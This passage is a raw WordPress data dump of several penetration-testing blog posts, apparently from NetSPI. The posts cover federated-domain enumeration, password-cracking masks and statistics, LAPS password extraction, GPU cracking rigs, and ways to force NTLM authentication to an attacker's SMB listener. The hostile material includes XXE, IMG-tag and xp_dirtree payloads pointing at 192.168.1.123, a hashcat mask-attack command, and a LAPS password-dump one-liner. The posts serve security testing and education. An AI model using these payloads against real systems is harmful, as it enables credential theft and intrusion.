  • Need an audience? How about a group meeting with everyone (up to 250 users - source) in an organization at the same time?
  • Need to find an office to use for the day during onsite social engineering? Find the person who’s out of office for the day and set up shop in their spot.

Final Notes

For the defenders that are reading this, you should probably set up limitations on who you federate with. An overview of the different types of federation can be found here. Additionally, you may want to see if federation really makes sense for your organization. Sources Note: There is some really great prior work that was done by Jason Ostrom, Karl Feinauer, and William Borskey that they presented at DEF CON 20. Take a look at their talk on YouTube or their slides. [post_title] => Attacking Federated Skype for Business with PowerShell [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-federated-skype-powershell [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:29 [post_modified_gmt] => 2021-06-08 21:47:29 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6445 [menu_order] => 648 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [45] => WP_Post Object ( [ID] => 6298 [post_author] => 10 [post_date] => 2016-05-03 07:00:08 [post_date_gmt] => 2016-05-03 07:00:08 [post_content] => The Economy of Mechanism - Office365 SAML assertions vulnerability popped up on my radar this week and it’s been getting a lot of attention. The short version is that you could abuse the SAML authentication mechanisms for Office365 to access any federated domain.  It’s a really serious and interesting issue that you should totally read about, if you haven't already. I have a feeling that this will bring more attention to domain federation attacks and hopefully some new research into the area. Since I’m currently working on some ADFS research (and had this written), I figured now was a good time to release a simple PowerShell tool to enumerate ADFS endpoints using Microsoft’s own APIs. The SAML assertions blog post mentions using this same method to identify federated domains through Microsoft. I’ve wrapped it in PowerShell to make it a little more accessible. This tool should be handy for external pen testers that want to enumerate potential authentication points for federated domain accounts.

Office365 Authentication

If you are trying to authenticate to the Office365 website, Microsoft will do a lookup to see if your email account has authentication managed by Microsoft, or if it is tied to a specific federation server. This can be seen if you proxy your traffic while authenticating to the Office365 portal. Here’s an example request from the client with an email address to check.
GET /common/userrealm/?user=karl@example.com&api-version=2.1&checkForMicrosoftAccount=true HTTP/1.1
Host: login.microsoftonline.com
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
You will get one of two JSON responses back from Microsoft:
  1. A response for a federated domain server endpoint:
    {
      "MicrosoftAccount":1,
      "IsDomainVerified":0,
      "NameSpaceType":"Federated",
      "federation_protocol":"WSTrust",
      "Login":"karl@example.com",
      "AuthURL":"https://adfs.example.com/adfs/ls/?username=karl%40example.com&wa=wsignin1.0&wtrealm=urn%3afederation%3aMicrosoftOnline&wctx=",
      "DomainName":"example.com",
      "FederationBrandName":"ExampleCompany"
    }
  2. A response for a domain managed by Microsoft:
    {
      MicrosoftAccount=1; 
      NameSpaceType=Managed; 
      Login=support@OtherExample.com; 
      DomainName=OtherExample.com; 
      FederationBrandName=Other Example; 
      TenantBrandingInfo=; 
      cloudinstancename=login.microsoftonline.com
    }

The PowerShell tool

To make this easier to parse, I wrote a PowerShell wrapper that makes the request out to Microsoft, parses the JSON response, and returns the information from Microsoft into a datatable. You can also use the -cmd flag to return a command that you can run to try and authenticate to either federated domain servers or to the Microsoft servers. Here’s a link to the code - https://github.com/NetSPI/PowerShell/blob/master/Get-FederationEndpoint.ps1 Here’s an example for each scenario:

Federated Endpoint:

PS C:> Get-FederationEndpoint -domain example.com -cmd | ft -AutoSize

Make sure you use the correct Username and Domain parameters when you try to authenticate!

Authentication Command:
Invoke-ADFSSecurityTokenRequest -ClientCredentialType UserName -ADFSBaseUri https://example.com/ -AppliesTo https://example.com/adfs/services/trust/13/usernamemixed -UserName 'test' -Password 'Summer2016' -Domain 'example.com' -OutputType Token -SAMLVersion 2 -IgnoreCertificateErrors

Domain      Type      BrandName           AuthURL                                                                                                                                                     
------      ----      ---------           -------                                                                                                                                                     
example.com Federated Example Company LLC https://example.com/app/[Truncated]
If you're trying to authenticate with this command, it's important to note that this does require you to guess/know the domain username of the target (hence the warning). Frequently, we’ll see that the email address account name (ex. kfosaaen) does not line up with the domain account name (ex. a123456).

Microsoft Managed:

PS C:> Get-FederationEndpoint -domain example.com -cmd | ft -AutoSize

Domain is managed by Microsoft, try guessing creds this way:

    $msolcred = get-credential
    connect-msolservice -credential $msolcred

Domain      Type    BrandName AuthURL
------      ----    --------- -------
example.com Managed example    NA
If you get back the “managed” response from Microsoft, you can just use the Microsoft AzureAD tools to login (or attempt logins). Since this returns a datatable, it's easy to pipe in a list of emails to lookup federation information on. Get Content Pic *Screenshot Note - This was renamed from Get-ADFSEndpoint to Get-FederationEndpoint (10/06/16)

Prerequisites

Both of the authentication methods that the script returns are taken from Microsoft, and since I don’t own that code, I can’t redistribute it. But here’s some links to get the authentication tools from them. The code for Invoke-ADFSSecurityTokenRequest comes from this Microsoft post: The Microsoft managed authentication side (connect-msolservice) comes from the Azure AD PowerShell module. See Here: Finally, here’s a nice run down from Microsoft on how you can connect to any of the Microsoft online services with PowerShell:

Future Work

Taking this further, you could wrap both of these authentication functions to automate brute force password guessing attacks against accounts. Additionally, you could just use this script to enumerate the federation information for the Alexa top 1 million sites. Personally, I won’t be doing that, as I don’t want to send a million requests out to Microsoft. I actually have some other stuff in the works that is directly related to this, but it’s not quite ready to post yet. So keep an eye on the blog for more interesting ADFS attacks. [post_title] => Using PowerShell to Identify Federated Domains [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => using-powershell-identify-federated-domains [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:47:27 [post_modified_gmt] => 2021-06-08 21:47:27 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6298 [menu_order] => 650 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [46] => WP_Post Object ( [ID] => 5987 [post_author] => 10 [post_date] => 2016-01-19 07:00:33 [post_date_gmt] => 2016-01-19 07:00:33 [post_content] =>

Over the course of the last year, we’ve cracked a lot of NTLM domain password hashes. During many of our internal penetration tests, we grab the password hashes for all of the domain users and attempt to crack them. Throughout the year, we keep track of the hashes that we’ve cracked and try to gain some insight into how people are choosing passwords, and what we can do to identify some common weaknesses.

At the end of the last year, we took a look at the breakdown of lengths, common words, and number of duplicates. Since we captured more than double the number of hashes this year compared to 2014, it got to be a pain to track each and every domain hash cracking job.  Going forward, I’m looking to implement some better metrics in our cracking process to better tally these numbers and trends throughout the year.

I’ve compiled a list of our top password masks for the year. This was pretty easy to do, as we keep a running list of the cracked passwords for the year to reuse in other password cracking attempts. I have a handy Perl script  that I feed the cracked list into to determine the masks.

Below is the top 10 list of password masks for 2015’s cracked NTLM passwords.

The Top 10

#MaskExample Password% of Matching Cracked Passwords
1?u?l?l?l?l?l?d?dSpring155.45%
2?u?l?l?l?l?l?l?d?dJanuary154.14%
3?u?l?l?l?l?l?l?l?d?dDecember153.10%
4?u?l?l?l?d?d?d?dFall20152.91%
5?u?l?l?l?l?d?d?d?dMarch20152.79%
6?u?l?l?l?l?l?d?d?d?dWinter20152.72%
7?u?l?l?l?l?l?l?dJanuary12.34%
8?u?l?l?l?l?d?d?dMarch1231.98%
9?u?l?l?l?l?l?l?l?dFebruary11.72%
10?u?l?l?l?l?l?d?d?dAugust1231.51%

Legend
?u = Uppercase letter
?l = Lowercase letter
?d = Decimal number (0-9)

Given that we see some combination of month, day, season, and/or year in every domain that we encounter, I figured I would do all of our examples in that format. For what it’s worth, all of the example passwords here were found in the cracked list.

The top 10 patterns listed above account for 28.66% of the cracked password list.

The top 40 patterns (Download Links Below) for the year account for 50.83% of the passwords that we cracked for the year (not 50% of the hashes gathered for the year). Now please keep in mind that these are just for the cracked passwords. This is a uniqued list. It does not account for duplicates and that means it does not truly reflect the real mileage that you could get with using these on a typical domain. Running the top 10 masks against a recent domain dump allowed us to crack 29% of the hashes in seven and a half minutes. So this does give pretty decent coverage.

Hypothetically, if we cracked 80% of the unique hashes for the year, this list of 40 masks could crack about 40% of the unique domain passwords. Statistics are fun, but since I don’t have solid numbers for every NTLM domain hash that we attempted to crack this year, I can’t really give you this info.

Interesting things to note

  1. Not a single one of our top ten masks has a special character in it.
    1. We actually don’t hit a special character in a mask until #12 on the list. In fact, 63% of the passwords that were cracked did not contain a special character. This was only slightly surprising, as you can still have a password that hits (most) Windows GPO complexity requirements without having special characters.
  2. Of the top 40 patterns, all of the masks are between 8 and 12 characters.
    1. Again, not a big surprise as most domain password length requirements are set at 8 characters.
  3. People really like capitalized words for their passwords.
    1. Only four of the top 40 masks don’t follow a dictionary word appended with something. I’d like to say that this is just skewed based off our cracking methodology, but most of the passwords that we’re running into contain a dictionary word .

So what do I do with these?

OCLHashcat has support for these mask files. Just use the attack mode 3 (brute force) option and provide the list of masks to use in a text file.
./oclHashcat64.bin -m 1000 hashes.txt -o output.txt -a 3 2015-Top40-Time-Sort.hcmask

When should I use these?

Personally, I would use these after I’ve gone through some dictionaries and rules. Since this is a brute force attack (on a limited key-space) this is not always as efficient as the dictionary and rule-based attacks. However, I have found that this works well for passwords that are not using dictionary words. For example, a dictionary and rule would catch Spring15, but it would be less likely to catch Gralwu94. However, Gralwu94 would be caught by a mask attack in this situation.

How long would this take?

That depends. We have a couple of GPU cracking boxes that we can distribute this against, but if we just ran it on our main cracking system, it would take about three and a half days to complete. That’s a really long time. There’s a few weird ones in the list that were easy to crack with word lists and rules (resulting in lots of mask hits), but they take a long time to brute force the key space (?u?l?l?l?l?l?l?l?l?l?d?d - Springtime15). I went through and time stamped each of the top 40 and created a time sorted list that you can quit using when you start hitting your own time limits.

2015 - Top 40 Masks List

2015 - Time Sorted Top 40 Masks List

[post_title] => NetSPI’s Top Password Masks for 2015 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspis-top-password-masks-for-2015 [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:51 [post_modified_gmt] => 2021-04-13 00:05:51 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=5987 [menu_order] => 660 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [47] => WP_Post Object ( [ID] => 4496 [post_author] => 10 [post_date] => 2015-07-22 07:00:36 [post_date_gmt] => 2015-07-22 07:00:36 [post_content] => Recently there was a big fuss over the “Redirect to SMB” blog that was put out by Brian Wallace. Personally, I think that the recent scare over this vulnerability is a little overstated, but it could be a useful way to capture an SMB hash. I was already in the process of putting together this list, so here’s a bunch of other ways that you can force a UNC path and capture credentials. UNC paths are one of my favorite things to use during a pen test. Once I force an account to authenticate to me over SMB, I have two options: Capture and Crack the hash or Relay the hash on to another computer. Plenty has been written about both options, so we won’t cover that here. The methods outlined below should give you some options for where you can use UNC paths to force authentication back to your attacking box. Firewall rules and file restrictions can really mess up some of these, so your mileage may vary. For demo purposes, we will be using "192.168.1.123test" as our listening UNC path / SMB server. Here's a linked table, if you want to directly jump to one of these: Honorable Mention:

1. XML External Entity Injection

External entity injection can be a very handy way to read files off of a remote system, but if that server happens to be a Windows system, you can utilize a UNC path.
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:////192.168.1.123/test.txt" >]>
<foo>&xxe;</foo>
Antti Rantasaari from NetSPI has been doing some really cool work in this space, so check out his blogs for more info.

2. Broken IMG Tags

Using a UNC path for an IMG tag can be pretty useful. Depending on where your SMB listener is (on the internal network) and what browser the victim is using (IE), there’s a chance that the browser will just send the hash over automatically. These can also be embedded anywhere that may process HTML (email, thick apps, etc.). “Internet Explorer's Intranet zone security setting must be set to Automatic logon only in Intranet zone. This is the default setting for Internet Explorer.” (Source)
<img src=192.168.1.123test.gif>

3. Directory Traversals

I wrote about this a while back, but web applications that allow you to specify a file path may be vulnerable to UNC path injection. By inputting a UNC path (instead of your typical .... or C: directory traversal),  you may be able to capture the credentials for the service account that runs the web application. Change the Id parameter in this URL:
  • https://test.example.com/Print/FileReader.aspx?Id=/reports/test.pdf&Type=pdf
To this:
  • https://test.example.com/Print/FileReader.aspx?Id=192.168.1.123test.pdf&Type=pdf

4. Database Queries/injections

My co-worker, Scott Sutherland, wrote about using built-in SQL server procedures to do SMB relay attacks. This one can be really handy if you have databases that allow the “domain users” group to authenticate. It’s surprising to see how many database servers are running with domain admin service accounts. Just use the xp_dirtree or xp_fileexist stored procedures and point them at your SMB capture server.
xp_dirtree '192.168.1.123'
xp_fileexist '192.168.1.123'
There’s a bunch more SQL procedures out there that you could potentially use, but these two are pretty reliable. Anytime you can read a file in SQL, you can probably use a UNC path in it. This attack also applies to Oracle. The Metasploit "auxiliary/admin/oracle/ora_ntlm_stealer" module can do it and there's a great blog about Oracle SMB relay on the ERPScan blog.

5. File Shares

If you have write access to a file share, you have a couple of options for getting hashes.
  1. Here’s a great one from Mubix - Modify the path for the icons for .lnk shortcut links to a UNC path
  2. Microsoft Word documents can also be modded with Metasploit (use auxiliary/docx/word_unc_injector) to inject UNC pathes into the documents.

6. Drive Mapping on Login

This may be overkill, but it could be handy for persistence. By modding any scripts used to map network drives for users, you can add your own UNC path in as an additional drive to map. This is handy as any users who have this drive added will send you credentials every time they log in. If you don't have rights to overwrite the start up scripts, GDS Security has a nice blog about setting this up with Metasploit and spoofing the start up script server.

7. Thick Applications

Basically anywhere that you can tell an app to load a file, you potentially add in a UNC path. We have seen many file upload dialogs in thick applications that allow this. This is even better with hosted thick client applications that are running under the context of a terminal server user (and not the application user). This can also be really handy for kiosk applications. For more thick app breakouts, check out Scott's "Breaking Out!" blog. Bfe B Ec Db Ebff Ce Ec

8. The LMhosts.sam file

Mubix has a couple of great UNC tricks in his “AT is the new black” presentation. I already called out the .lnk files up above, but by modifying the LMhosts.sam file, you can sneak in a UNC path that forces the user to load a remote hosts file. Here's a sample LMhosts.sam using our UNC path:
192.168.1.123    netspi #PRE
#BEGIN_ALTERNATE
#INCLUDE netspitesthosts.txt
#END_ALTERNATE

9. SharePoint

On many of our pen tests, we get access to accounts that can edit everybody’s favorite intranet site, SharePoint. Using any of the other listed methods, you should be able to drop files or direct UNC links on the SharePoint site. Just make sure you go back and clean up the page(s) when you’re done.

10. ARP spoofing - Ettercap filters

There are tons of fun things that you can do with Ettercap filters. One of those things is overwriting content with UNC paths. By injecting a UNC path into someone’s HTML document, clear text SQL query, or any of the protocols mentioned above you should be able to get them to authenticate back to your attacking machine.

Honorable Mention:

11. Redirect to SMB

For what it’s worth, this issue has been out for a very long time. Basically, you get your victim to visit your malicious HTTP server and you 302 redirect them to a UNC file location. If the browser (or program making the HTTP request) automatically authenticates, then the victim will send their hash over to the UNC location. Some of the methods above (See XXE) allow for this if you use an HTTP path instead of the UNC path.

Conclusion

I'm sure that there's a couple that I missed here, but feel free to add them in the comments. [post_title] => 10 Places to Stick Your UNC Path [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => 10-places-to-stick-your-unc-path [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:38 [post_modified_gmt] => 2021-06-08 21:46:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=4496 [menu_order] => 668 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [48] => WP_Post Object ( [ID] => 4020 [post_author] => 10 [post_date] => 2015-05-05 07:00:58 [post_date_gmt] => 2015-05-05 07:00:58 [post_content] =>

Intro

Managing credentials for local administrator accounts is hard to do. From setting strong passwords, to setting unique passwords across multiple machines, we rarely see it done correctly. On the majority of our pen tests we see that most of the domain computers are configured with the same local admin credentials. This can be really handy as an attacker, as it provides us lateral access to systems across the network.

One of the reported fixes (from Microsoft) is to store the local admin passwords in LDAP as a confidential attribute of the computer account. This can be automated using Microsoft tools and strong local passwords can be enforced (and automatically changed). In theory, this is a nice idea. But in practice it results in the cleartext storage of passwords (not good). Previous attempts at local administrator credential management (from Microsoft) resulted in local administrator credentials being exposed to all users on the domain (through group policy preferences). The GPP cpassword storage passwords issue was fixed (5/13/14) and we’re not seeing it as frequently any more.

LAPS

Img E C A A

LAPS is Microsoft’s tool to store local admin passwords in LDAP. As long as everything is configured correctly, it should be fine to use. But if you don’t set the permissions correctly on the LDAP attributes, you could be exposing the local admin credentials to users on the domain. LAPS uses two LDAP attributes to store the local administrator credentials, ms-MCS-AdmPwd (stores the password) and ms-MCS-AdmPwdExpirationTime (stores when it expires). The Microsoft recommendations says to remove the extended rights to the attributes from specific users and groups. This is a good thing to do, but it can be a pain to get set up properly. Long story short, if you’re using LAPS, someone on the domain should be able to read those local admin credentials in cleartext. This will not always be a privilege escalation route, but it could be handy data to have when you're pivoting to sensitive systems after you’ve escalated. In our demo domain, our LAPS deployment defaulted to allowing all domain users to have read access to the password. We also could have screwed up the install instructions.

I put together a quick PowerShell script to pull the LAPS specific LDAP attributes for all of the computers joined to the domain. I used Scott Sutherland’s Get-ExploitableSystems script (now included in PowerView) as the template. You can find it on my GitHub page.

Script Usage and Output

Here’s the output using an account that does not have rights to read the credentials (but proves they exist):

PS C:> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential DEMOkarl | Format-Table -AutoSize

Hostname                    Stored Readable Password Expiration
--------                    ------ -------- -------- ----------
WIN-M8V16OTGIIN.test.domain   0      0               NA
WIN-M8V16OTGIIN.test.domain   0      0               NA
ASSESS-WIN7-TEST.test.domain  1      0               6/3/2015 7:09:28 PM

Here’s the same command being run with an account with read access to the password:

PS C:> Get-LAPSPasswords -DomainController 192.168.1.1 -Credential DEMOadministrator | Format-Table -AutoSize

Hostname                    Stored Readable Password       Expiration
--------                    ------ -------- --------       ----------
WIN-M8V16OTGIIN.test.domain   0      0                     NA
WIN-M8V16OTGIIN.test.domain   0      0                     NA
ASSESS-WIN7-TEST.test.domain  1      1      $sl+xbZz2&qtDr 6/3/2015 7:09:28 PM

The usage is pretty simple and everything is table friendly, so it’s easy to export to a CSV.

Special thanks to Scott Sutherland for letting me use his Get-ExploitableSystems script as the bones for the script. The LDAP query functions came from Carlos Perez's PoshSec-Mod (and also adapted from Scott's script). And the overall idea to port this over to a Powerview-friendly function came from a conversation with @_wald0 on Twitter.

Links

LDAP is a great place to mine for sensitive data. Here’s a couple of good examples:

Bonus Material

If you happen to have the AdmPwd.PS PowerShell module installed (as part of LAPS), you can use the following one-liner to pull all the local admin credentials for your current domain (assuming you have the rights):

foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}}
[post_title] => Running LAPS Around Cleartext Passwords [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => running-laps-around-cleartext-passwords [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:18 [post_modified_gmt] => 2021-06-08 21:46:18 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=4020 [menu_order] => 674 [post_type] => post [post_mime_type] => [comment_count] => 2 [filter] => raw ) [49] => WP_Post Object ( [ID] => 3585 [post_author] => 10 [post_date] => 2015-04-27 07:00:32 [post_date_gmt] => 2015-04-27 07:00:32 [post_content] =>

A little over two years ago, we built our first GPU cracking box. At the time, there was pretty limited information on what people were doing to build a decent cracking box, especially if you were trying to do so without breaking the bank. As with any piece of technology, things go out of date, things get upgraded, and documentation needs to get updated. Since it’s now two years since I wrote about our first system , I figured it was time to write an update to show what we’re actually using for cracking hardware now.

The Case

We currently have two cracking systems, Development and Production. Our development system is seated in a really nice (and relatively cheap) case that we picked up from MiningRigs.net. The big downside of this case is that we can’t immediately buy another one. The group making the case had recently switched to a Kickstarter model (we were one of the only backers), but they secured outside funding for the cases and are now building more. As soon as they have them ready, we're planning on picking up another one.

Dan Case

Our production system is currently housed in a much lower-tech case… Three Milkcrates. As you can see, we’ve graduated from server shelving to an arguably crazier option. After seeing a number of Bitcoin miners using the milkcrate method for cases, we moved our cards over. This has actually worked quite well. The only issue that we’ve run into (outside of noise) is high temperatures on some of the cards. We’ve been able to keep the heat issues away by manually setting the fan speeds on all of the cards to 100%.

Cratecase E

*Update (5/19/15): We actually got another rack-mount case for our production system. Goodbye milk crates.

B E C E C Dde Dae E Da C E

The Motherboard

One of the big changes that we were happy to see over the last two years was the move by hardware manufacturers to embrace Bitcoin miners (even though most have moved off of GPU mining). ASRock now makes a Bitcoin specific motherboard (H81 PRO BTC) that is specifically geared towards running multiple GPUs. With six PCI-E slots, it’s a very inexpensive ($65) choice for creating a cracking box. Five of the slots are PCI-E 1x slots (and mounted pretty closely together), so you will need to use risers to attach your cards.

The Risers/Extenders

Another Bitcoin focused product that we’ve been using are the USB 3.0 PCI-E risers  (or extenders). These little devices allow you to put a PCI-E 16x card into a PCI-E 1x slot. The card then attaches to the motherboard with a USB cable. Basically, these extend your PCI-E slots using USB cables. These are much cleaner and more reliable than the ribbon riser cables we started using.

The Cards

I will say that I really like the newer cards (R9 290) that we are currently running. They have decent cracking rates and I really haven’t had too many issues with them so far. The biggest issue has been heat. This can mostly be mitigated by having decent airflow around the case and setting the fan speeds on your cards to the max. The fan speeds can be set using the aticonfig command  (pre-R series cards) or od6config for newer cards. One of the biggest pains that I’ve dealt with on our systems is getting all the fans set correctly for all the cards, specifically when you have a mix of older and newer cards. For simplicity’s sake, I would recommend going with one card model for your cracking box. The newer cards are nice, but if you can find someone trying to offload some older 7950s, I would recommend buying those.

The Power Supplies

Our recommendations on power supplies haven’t changed. Only running one to three cards? You will probably be fine with one power supply. Going any higher and you will want two. Shoot for higher wattage power supplies (800+) and get a Y-Splitter.

CPU/RAM/Hard Drive

All of these can be generic. It doesn’t hurt to max these out, but they don't really impact cracking performance. If you’re going to throw money around, throw it at your cards.

Here's a pretty general parts and pricing list if you want to build your own.

ComponentModelEst. Price
Case6 GPU Rackmount Server Case$495
MotherboardASRock Motherboard H81 PRO BTC$64
Risers (6)PCI-E 1X To 16X USB 3.0 Riser Card$24
GPUs (6)XFX Black Edition R9 290$1,884
Power Supply (2)CORSAIR AX1200i 1200W$618
Power-SplitterDual PSU Adapter Cable$9
RAM8 GB - Any Brand$50
CPUIntel Celeron G1820 Dual-Core (2.7GHz)$45
HDD1 TB - Any Brand$50
Total $3,239

If you have any questions or better parts recommendations, feel free to leave a comment below.

[post_title] => GPU Cracking: Rebuilding the Box [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => gpu-cracking-rebuilding-box [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:09 [post_modified_gmt] => 2021-06-08 21:46:09 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=3585 [menu_order] => 676 [post_type] => post [post_mime_type] => [comment_count] => 16 [filter] => raw ) [50] => WP_Post Object ( [ID] => 2855 [post_author] => 10 [post_date] => 2015-03-02 07:00:36 [post_date_gmt] => 2015-03-02 07:00:36 [post_content] => It’s been a big year for password cracking at NetSPI. We’ve spent a lot of time refining our dictionaries and processes to more efficiently crack passwords. This has been a huge help during our pentests, as the cracked passwords have been the starting point for gaining access to systems and applications. While this blog focuses on the Windows domain hashes (LM/NTLM) that we’ve cracked this year, these statistics also translate into the other hashes that we run into (MD5, NetNTLM, etc.) during penetration tests. During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a summary of the hashes that we attempted to crack in 2014. Please keep in mind that this is not an all-encompassing sample. We do not collect domain hashes during every single penetration test, as some clients do not want us to. Additionally, these are Windows domain credentials. These are not web site or application passwords, which frequently have weaker password complexity requirements. This year, we collected 90,977 domain hashes. On average, we still see about ten percent of domain hashes that are stored with their LM hashes. This is due to accounts that do not change their passwords after the NTLM-only group policy gets applied. The LM hashes definitely helped our password cracking numbers, but they were not crucial to the cracking success. Of the collected hashes, 27,785 were duplicates, leaving 63,192 unique hashes. Of the total 90,977 hashes, we were able to crack 77,802 (85.52%). In terms of cracking effort, we typically put about a day's worth of effort into the hashes when we initially get them. I did an additional five days of cracking time on these, once we hit the end of the year. Piegraph Here’s nine of the top passwords that we used for guessing during online brute-force attacks:
  • Password1 - 1,446
  • Spring2014 - 219
  • Spring14 - 135
  • Summer2014 - 474
  • Summer14 - 221
  • Fall2014 - 150
  • Autumn14 - 15*
  • Winter2014 - 87
  • Winter14 - 63
*Fall14 is too short for most complexity requirements Combined, these account for 3.6% of all accounts. These are typically used for password guessing attacks, as they meet password complexity requirements and they’re easy to remember. This may not seem like a large number, but once we have access to one account, lots of options open up for escalation. Other notable reused passwords:
  • Changem3 - 820
  • Work1234 - 283
  • Password2 - 142
  • Company Name followed by a one (Netspi1)
Cracked Password Length Breakdown: As you can see below, the cracked passwords peak at the eight character length. This is a pretty common requirement for minimum password length, so it’s not a big surprise that this is the most common length cracked. It should also be noted that since we’re able to get through the entire eight character key space in about two days. This means any password that was eight characters or less was cracked within two days. Bargraph Some interesting finds:
  • Most Common Password (3,003 instances): [REDACTED] (This one was very specific to a client)
  • Longest Password: UniversityofNorthwestern1 (25 characters)
  • Most Common Length (33,654 instances - 43.2%): 8 characters
  • Instances of “password” (full word, case-insensitive): 3,266 (4.4%)
  • Blank passwords: 362
  • Ends with a “1”: 10,025 (12.9%)
  • Ends with “14”: 4,617 (6%)
  • Ends with “2014”: 2645 (3.4%)
  • Passwords containing profanity (“7 dirty words” - full words, no variants): 48
  • Top mask pattern: ?u?l?l?l?l?l?d?d (3,439 instances - 4.4%)
    • Matches Spring14
    • 8 Characters
    • Upper, lower, and number
  • The top 10 mask patterns account for 37% of the cracked passwords
    • The top 10 masks took 25 minutes for us to run on our GPU cracking system
  • One of our base dictionaries with the d3ad0ne rule cracked 52.7% of the hashes in 56 seconds
Note: I used Pipal to help generate some of these stats. I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this year. You can download them here. Additionally, I put together one for every quarter. These can be found in the previous quarter blogs: For more information on how we built our GPU-enhanced password cracking box, check out our slides For a general outline of our password cracking methodology check out this post [post_title] => NetSPI's Top Cracked Passwords for 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspis-top-cracked-passwords-for-2014 [to_ping] => [pinged] => [post_modified] => 2022-09-30 12:39:49 [post_modified_gmt] => 2022-09-30 17:39:49 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=2855 [menu_order] => 684 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [51] => WP_Post Object ( [ID] => 1922 [post_author] => 10 [post_date] => 2014-12-15 07:00:13 [post_date_gmt] => 2014-12-15 07:00:13 [post_content] => During many of our penetration tests, we gather domain password hashes (with permission of the client) for offline cracking and analysis. This blog is a quick summary of the hashes that we attempted to crack in the third quarter of 2014 (and so far for this year). The plan is continue doing this again at the end of the year to see how we did overall for the year (three quarters down, one to go). Please keep in mind that this is not an all-encompassing sample. We do not collect domain hashes during every single penetration test, as some clients do not want us to. The sample for this quarter included three sets of domain hashes that added up to 26,692 hashes. Two of the three sets had some LM hashes stored along with the NTLM hashes, but none of the LM stored passwords were that complicated. Just like last quarter, it wasn’t a huge advantage. Of the hashes, 11,776 were duplicates, leaving 14,916 unique hashes. Of the 26,692 hashes, we were able to crack 21,955 (82.25%). Crackingstats Cracked Password Length Breakdown: Crackingstats As you can see, the cracked passwords peak at the eight character length. This is pretty common for a minimum password length, so it’s not a big surprise that this is the most common length cracked. It’s also been the peak every quarter this year. It should also be noted that since we’re able to get through the entire eight character keyspace in about two and a half days, which may be influencing the peak. Some interesting finds:
  • Most Common Password (1120 instances): A Client Specific Default Account Password
  • Longest Password: jesusitrustinyou@123 (20 characters)
  • Most Common Length (8,656 instances): 8 characters
  • Instances of “Summer2014”: 394
  • Instances of “Spring123”: 300
  • Instances of “Summer123”: 262
  • Instances of “Summer14”: 163
  • Instances of “password” (full word, case-insensitive): 251
  • Blank passwords: 348
  • Top mask pattern: ?u?l?l?l?d?d?d?d?s (1,415 instances)
So far this year, we’ve collected 60,638 hashes to crack. Of those, we’ve been able to crack 51,393 (84.75%). Q Pie Here’s the length breakdown for the year, so far. Q Bar Some more interesting finds:
  • Most Common Password – (that we can print here): Password1 (1410 instances)
  • Longest Passwords: Six different passwords were 20 characters
  • Most Common Length (22,994 instances): 8 characters
  • Instances of “password” (full word, case-insensitive): 2,926
  • Instances of “SEASON2014”: 1,404
    • -SEASON = spring, summer, fall, winter (case-insensitive)
  • Top Mask Pattern: ?u?l?l?l?l?l?d?d (3,068 instances)
I put together an hcmask file (to use with oclHashcat) of our top forty password patterns that were identified for this quarter. Additionally, I put together one for everything that we’ve cracked for the first half of the year. You can download them here – Q3 Hcmask File - Q1,Q2,Q3 Hcmask File. I plan on wrapping this up next quarter, so check back to see how this mask files have changed and to see how well we’ve done across the year. For more information on how we built our GPU-enhanced password cracking box, check out our slides. For a general outline of our password cracking methodology check out this post. [post_title] => Cracking Stats for Q3 2014 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => cracking-stats-q3-2014 [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:43:19 [post_modified_gmt] => 2021-06-08 21:43:19 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=1922 [menu_order] => 692 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [52] => WP_Post Object ( [ID] => 1106 [post_author] => 10 [post_date] => 2014-10-06 07:00:38 [post_date_gmt] => 2014-10-06 07:00:38 [post_content] =>

Lately, Eric Gruber and I have been speaking about the cracking box that we built at NetSPI. Every time we present, the same question always comes up.

“What about Rainbow Tables?”

